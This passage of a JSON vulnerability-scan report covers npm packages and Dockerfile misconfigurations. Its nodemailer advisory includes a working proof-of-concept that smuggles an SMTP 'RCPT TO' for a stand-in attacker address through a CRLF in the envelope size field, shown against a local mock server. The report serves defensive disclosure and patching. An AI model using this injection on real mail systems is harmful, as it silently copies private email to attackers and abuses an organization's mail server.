], "PublishedDate": "2026-04-08T15:05:20Z", "LastModifiedDate": "2026-04-08T15:05:20Z" }, { "VulnerabilityID": "GHSA-c7w3-x93f-qmm8", "PkgID": "nodemailer@6.10.1", "PkgName": "nodemailer", "PkgIdentifier": { "PURL": "pkg:npm/nodemailer@6.10.1", "UID": "c243d03ecfce3c20" }, "InstalledVersion": "6.10.1", "FixedVersion": "8.0.4", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://github.com/advisories/GHSA-c7w3-x93f-qmm8", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:db7b269ba78fc172252ce3cd328867fff8504078f310f34689e0690febfd1a1e", "Title": "Nodemailer has SMTP command injection due to unsanitized `envelope.size` parameter", "Description": "### Summary\nWhen a custom `envelope` object is passed to `sendMail()` with a `size` property containing CRLF characters (`\\r\\n`), the value is concatenated directly into the SMTP `MAIL FROM` command without sanitization. This allows injection of arbitrary SMTP commands, including `RCPT TO` — silently adding attacker-controlled recipients to outgoing emails.\n\n\n### Details\nIn `lib/smtp-connection/index.js` (lines 1161-1162), the `envelope.size` value is concatenated into the SMTP `MAIL FROM` command without any CRLF sanitization:\n\n```javascript\nif (this._envelope.size \u0026\u0026 this._supportedExtensions.includes('SIZE')) {\n args.push('SIZE=' + this._envelope.size);\n}\n```\n\nThis contrasts with other envelope parameters in the same function that ARE properly sanitized:\n- **Addresses** (`from`, `to`): validated for `[\\r\\n\u003c\u003e]` at lines 1107-1127\n- **DSN parameters** (`dsn.ret`, `dsn.envid`, `dsn.orcpt`): encoded via `encodeXText()` at lines 1167-1183\n\nThe `size` property reaches this code path through `MimeNode.setEnvelope()` in `lib/mime-node/index.js` (lines 854-858), which copies all non-standard envelope properties verbatim:\n\n```javascript\nconst standardFields = ['to', 'cc', 'bcc', 'from'];\nObject.keys(envelope).forEach(key =\u003e {\n if (!standardFields.includes(key)) {\n this._envelope[key] = envelope[key];\n }\n});\n```\n\nSince `_sendCommand()` writes the command string followed by `\\r\\n` to the raw TCP socket, a CRLF in the `size` value terminates the `MAIL FROM` command and starts a new SMTP command.\n\nNote: by default, Nodemailer constructs the envelope automatically from the message's `from`/`to` fields and does not include `size`. This vulnerability requires the application to explicitly pass a custom `envelope` object with a `size` property to `sendMail()`. \nWhile this limits the attack surface, applications that expose envelope configuration to users are affected.\n\n### PoC\nave the following as `poc.js` and run with `node poc.js`:\n\n```javascript\nconst net = require('net');\nconst nodemailer = require('nodemailer');\n\n// Minimal SMTP server that logs raw commands\nconst server = net.createServer(socket =\u003e {\n socket.write('220 localhost ESMTP\\r\\n');\n let buffer = '';\n socket.on('data', chunk =\u003e {\n buffer += chunk.toString();\n const lines = buffer.split('\\r\\n');\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log('C:', line);\n if (line.startsWith('EHLO')) {\n socket.write('250-localhost\\r\\n250-SIZE 10485760\\r\\n250 OK\\r\\n');\n } else if (line.startsWith('MAIL FROM')) {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('RCPT TO')) {\n socket.write('250 OK\\r\\n');\n } else if (line === 'DATA') {\n socket.write('354 Start\\r\\n');\n } else if (line === '.') {\n socket.write('250 OK\\r\\n');\n } else if (line.startsWith('QUIT')) {\n socket.write('221 Bye\\r\\n');\n socket.end();\n }\n }\n });\n});\n\nserver.listen(0, '127.0.0.1', () =\u003e {\n const port = server.address().port;\n console.log('SMTP server on port', port);\n console.log('Sending email with injected RCPT TO...\\n');\n\n const transporter = nodemailer.createTransport({\n host: '127.0.0.1',\n port,\n secure: false,\n tls: { rejectUnauthorized: false },\n });\n\n transporter.sendMail({\n from: 'sender@example.com',\n to: 'recipient@example.com',\n subject: 'Normal email',\n text: 'This is a normal email.',\n envelope: {\n from: 'sender@example.com',\n to: ['recipient@example.com'],\n size: '100\\r\\nRCPT TO:\u003cattacker@evil.com\u003e',\n },\n }, (err) =\u003e {\n if (err) console.error('Error:', err.message);\n console.log('\\nExpected output above:');\n console.log(' C: MAIL FROM:\u003csender@example.com\u003e SIZE=100');\n console.log(' C: RCPT TO:\u003cattacker@evil.com\u003e \u003c-- INJECTED');\n console.log(' C: RCPT TO:\u003crecipient@example.com\u003e');\n server.close();\n transporter.close();\n });\n});\n```\n\n**Expected output:**\n```\nSMTP server on port 12345\nSending email with injected RCPT TO...\n\nC: EHLO [127.0.0.1]\nC: MAIL FROM:\u003csender@example.com\u003e SIZE=100\nC: RCPT TO:\u003cattacker@evil.com\u003e\nC: RCPT TO:\u003crecipient@example.com\u003e\nC: DATA\n...\nC: .\nC: QUIT\n```\n\nThe `RCPT TO:\u003cattacker@evil.com\u003e` line is injected by the CRLF in the `size` field, silently adding an extra recipient to the email.\n\n### Impact\nThis is an SMTP command injection vulnerability. An attacker who can influence the `envelope.size` property in a `sendMail()` call can:\n\n- **Silently add hidden recipients** to outgoing emails via injected `RCPT TO` commands, receiving copies of all emails sent through the affected transport\n- **Inject arbitrary SMTP commands** (e.g., `RSET`, additional `MAIL FROM` to send entirely separate emails through the server)\n- **Leverage the sending organization's SMTP server reputation** for spam or phishing delivery\n\nThe severity is mitigated by the fact that the `envelope` object must be explicitly provided by the application. Nodemailer's default envelope construction from message headers does not include `size`. Applications that pass through user-controlled data to the envelope options (e.g., via API parameters, admin panels, or template configurations) are vulnerable.\n\nAffected versions: at least v8.0.3 (current); likely all versions where `envelope.size` is supported.", "Severity": "LOW", "VendorSeverity": { "ghsa": 1 }, "CVSS": { "ghsa": { "V40Vector": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N", "V40Score": 2.3 } }, "References": [ "https://github.com/nodemailer/nodemailer", "https://github.com/nodemailer/nodemailer/commit/2d7b9710e63555a1eb13d721296c51186d4b5651", "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-c7w3-x93f-qmm8" ], "PublishedDate": "2026-03-26T22:26:46Z", "LastModifiedDate": "2026-03-26T22:26:46Z" }, { "VulnerabilityID": "CVE-2026-41305", "VendorIDs": [ "GHSA-qx2v-qp2m-jg93" ], "PkgID": "postcss@8.4.31", "PkgName": "postcss", "PkgIdentifier": { "PURL": "pkg:npm/postcss@8.4.31", "UID": "d845910d063cee9a" }, "InstalledVersion": "8.4.31", "FixedVersion": "8.5.10", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-41305", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0086ad0890ab40dce9aff6b30459bf2f3c009f942faa4825d50709ee67cab3d6", "Title": "postcss: PostCSS: Cross-Site Scripting (XSS) via improper escaping of style closing tags", "Description": "PostCSS takes a CSS file and provides an API to analyze and modify its rules by transforming the rules into an Abstract Syntax Tree. Versions prior to 8.5.10 do not escape `\u003c/style\u003e` sequences when stringifying CSS ASTs. When user-submitted CSS is parsed and re-stringified for embedding in HTML `\u003cstyle\u003e` tags, `\u003c/style\u003e` in CSS values breaks out of the style context, enabling XSS. Version 8.5.10 fixes the issue.", "Severity": "MEDIUM", "CweIDs": [ "CWE-79" ], "VendorSeverity": { "ghsa": 2, "redhat": 2 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 }, "redhat": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "V3Score": 6.1 } }, "References": [ "https://access.redhat.com/security/cve/CVE-2026-41305", "https://github.com/postcss/postcss", "https://github.com/postcss/postcss/releases/tag/8.5.10", "https://github.com/postcss/postcss/security/advisories/GHSA-qx2v-qp2m-jg93", "https://nvd.nist.gov/vuln/detail/CVE-2026-41305", "https://www.cve.org/CVERecord?id=CVE-2026-41305" ], "PublishedDate": "2026-04-24T03:16:11.547Z", "LastModifiedDate": "2026-04-24T17:16:21.5Z" }, { "VulnerabilityID": "CVE-2026-45740", "VendorIDs": [ "GHSA-jggg-4jg4-v7c6" ], "PkgID": "protobufjs@7.5.6", "PkgName": "protobufjs", "PkgIdentifier": { "PURL": "pkg:npm/protobufjs@7.5.6", "UID": "11481e02f6a2a6cd" }, "InstalledVersion": "7.5.6", "FixedVersion": "7.5.8, 8.2.0", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45740", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:0c7c535ab3a0329218c83c03c24db05aed8e9bc3de59ef7112b23085b7c52d89", "Title": "protobufjs: Denial of Service via unbounded recursive JSON descriptor expansion", "Description": "protobufjs compiles protobuf definitions into JavaScript (JS) functions. Prior to 7.5.8 and 8.2.0, protobufjs could recurse without a depth limit while expanding nested JSON descriptors through Root.fromJSON() and Namespace.addJSON(). A crafted JSON descriptor with deeply nested namespace definitions could cause the JavaScript call stack to be exhausted during descriptor loading. This vulnerability is fixed in 7.5.8 and 8.2.0.", "Severity": "MEDIUM", "CweIDs": [ "CWE-674" ], "VendorSeverity": { "ghsa": 2, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "V3Score": 5.3 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "V3Score": 7.5 } }, "References": [ "https://github.com/protobufjs/protobuf.js", "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-jggg-4jg4-v7c6", "https://nvd.nist.gov/vuln/detail/CVE-2026-45740" ], "PublishedDate": "2026-05-13T16:17:00.52Z", "LastModifiedDate": "2026-05-13T20:50:15.587Z" }, { "VulnerabilityID": "CVE-2026-45736", "VendorIDs": [ "GHSA-58qx-3vcg-4xpx" ], "PkgID": "ws@8.18.3", "PkgName": "ws", "PkgIdentifier": { "PURL": "pkg:npm/ws@8.18.3", "UID": "f8dc386179443300" }, "InstalledVersion": "8.18.3", "FixedVersion": "8.20.1", "Status": "fixed", "SeveritySource": "ghsa", "PrimaryURL": "https://avd.aquasec.com/nvd/cve-2026-45736", "DataSource": { "ID": "ghsa", "Name": "GitHub Security Advisory npm", "URL": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Anpm" }, "Fingerprint": "sha256:54b51dc0dfb29c3a34ed11a3c1a3c26e8c1546c9a2c83cff9b3d42b63d290b98", "Title": "ws is an open source WebSocket client and server for Node.js. Prior to ...", "Description": "ws is an open source WebSocket client and server for Node.js. Prior to 8.20.1, the websocket.close() implementation is vulnerable to uninitialized memory disclosure when a TypedArray is passed as the reason argument. This vulnerability is fixed in 8.20.1.", "Severity": "MEDIUM", "CweIDs": [ "CWE-908" ], "VendorSeverity": { "ghsa": 2, "nvd": 3 }, "CVSS": { "ghsa": { "V3Vector": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N", "V3Score": 4.4 }, "nvd": { "V3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "V3Score": 7.5 } }, "References": [ "https://github.com/websockets/ws", "https://github.com/websockets/ws/commit/c0327ec15a54d701eb6ccefaa8bef328cfc03086", "https://github.com/websockets/ws/security/advisories/GHSA-58qx-3vcg-4xpx", "https://nvd.nist.gov/vuln/detail/CVE-2026-45736" ], "PublishedDate": "2026-05-15T15:16:54.103Z", "LastModifiedDate": "2026-05-19T14:39:20.353Z" } ] }, { "Target": "Dockerfile.dev", "Class": "config", "Type": "dockerfile", "MisconfSummary": { "Successes": 25, "Failures": 2 }, "Misconfigurations": [ { "Type": "Dockerfile Security Check", "ID": "DS-0002", "Title": "Image user should not be 'root'", "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", "Namespace": "builtin.dockerfile.DS002", "Query": "data.builtin.dockerfile.DS002.deny", "Resolution": "Add 'USER \u003cnon root user name\u003e' line to the Dockerfile", "Severity": "HIGH", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", "References": [ "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://avd.aquasec.com/misconfig/ds-0002" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } }, { "Type": "Dockerfile Security Check", "ID": "DS-0026", "Title": "No HEALTHCHECK defined", "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", "Message": "Add HEALTHCHECK instruction in your Dockerfile", "Namespace": "builtin.dockerfile.DS026", "Query": "data.builtin.dockerfile.DS026.deny", "Resolution": "Add HEALTHCHECK instruction in Dockerfile", "Severity": "LOW", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", "References": [ "https://blog.aquasec.com/docker-security-best-practices", "https://avd.aquasec.com/misconfig/ds-0026" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } } ] }, { "Target": "Dockerfile.production", "Class": "config", "Type": "dockerfile", "MisconfSummary": { "Successes": 25, "Failures": 2 }, "Misconfigurations": [ { "Type": "Dockerfile Security Check", "ID": "DS-0002", "Title": "Image user should not be 'root'", "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", "Namespace": "builtin.dockerfile.DS002", "Query": "data.builtin.dockerfile.DS002.deny", "Resolution": "Add 'USER \u003cnon root user name\u003e' line to the Dockerfile", "Severity": "HIGH", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", "References": [ "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://avd.aquasec.com/misconfig/ds-0002" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } }, { "Type": "Dockerfile Security Check", "ID": "DS-0026", "Title": "No HEALTHCHECK defined", "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", "Message": "Add HEALTHCHECK instruction in your Dockerfile", "Namespace": "builtin.dockerfile.DS026", "Query": "data.builtin.dockerfile.DS026.deny", "Resolution": "Add HEALTHCHECK instruction in Dockerfile", "Severity": "LOW", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", "References": [ "https://blog.aquasec.com/docker-security-best-practices", "https://avd.aquasec.com/misconfig/ds-0026" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } } ] }, { "Target": "Dockerfile.test", "Class": "config", "Type": "dockerfile", "MisconfSummary": { "Successes": 25, "Failures": 2 }, "Misconfigurations": [ { "Type": "Dockerfile Security Check", "ID": "DS-0002", "Title": "Image user should not be 'root'", "Description": "Running containers with 'root' user can lead to a container escape situation. It is a best practice to run containers as non-root users, which can be done by adding a 'USER' statement to the Dockerfile.", "Message": "Specify at least 1 USER command in Dockerfile with non-root user as argument", "Namespace": "builtin.dockerfile.DS002", "Query": "data.builtin.dockerfile.DS002.deny", "Resolution": "Add 'USER \u003cnon root user name\u003e' line to the Dockerfile", "Severity": "HIGH", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0002", "References": [ "https://docs.docker.com/develop/develop-images/dockerfile_best-practices/", "https://avd.aquasec.com/misconfig/ds-0002" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } }, { "Type": "Dockerfile Security Check", "ID": "DS-0026", "Title": "No HEALTHCHECK defined", "Description": "You should add HEALTHCHECK instruction in your docker container images to perform the health check on running containers.", "Message": "Add HEALTHCHECK instruction in your Dockerfile", "Namespace": "builtin.dockerfile.DS026", "Query": "data.builtin.dockerfile.DS026.deny", "Resolution": "Add HEALTHCHECK instruction in Dockerfile", "Severity": "LOW", "PrimaryURL": "https://avd.aquasec.com/misconfig/ds-0026", "References": [ "https://blog.aquasec.com/docker-security-best-practices", "https://avd.aquasec.com/misconfig/ds-0026" ], "Status": "FAIL", "CauseMetadata": { "Provider": "Dockerfile", "Service": "general" } } ] } ] }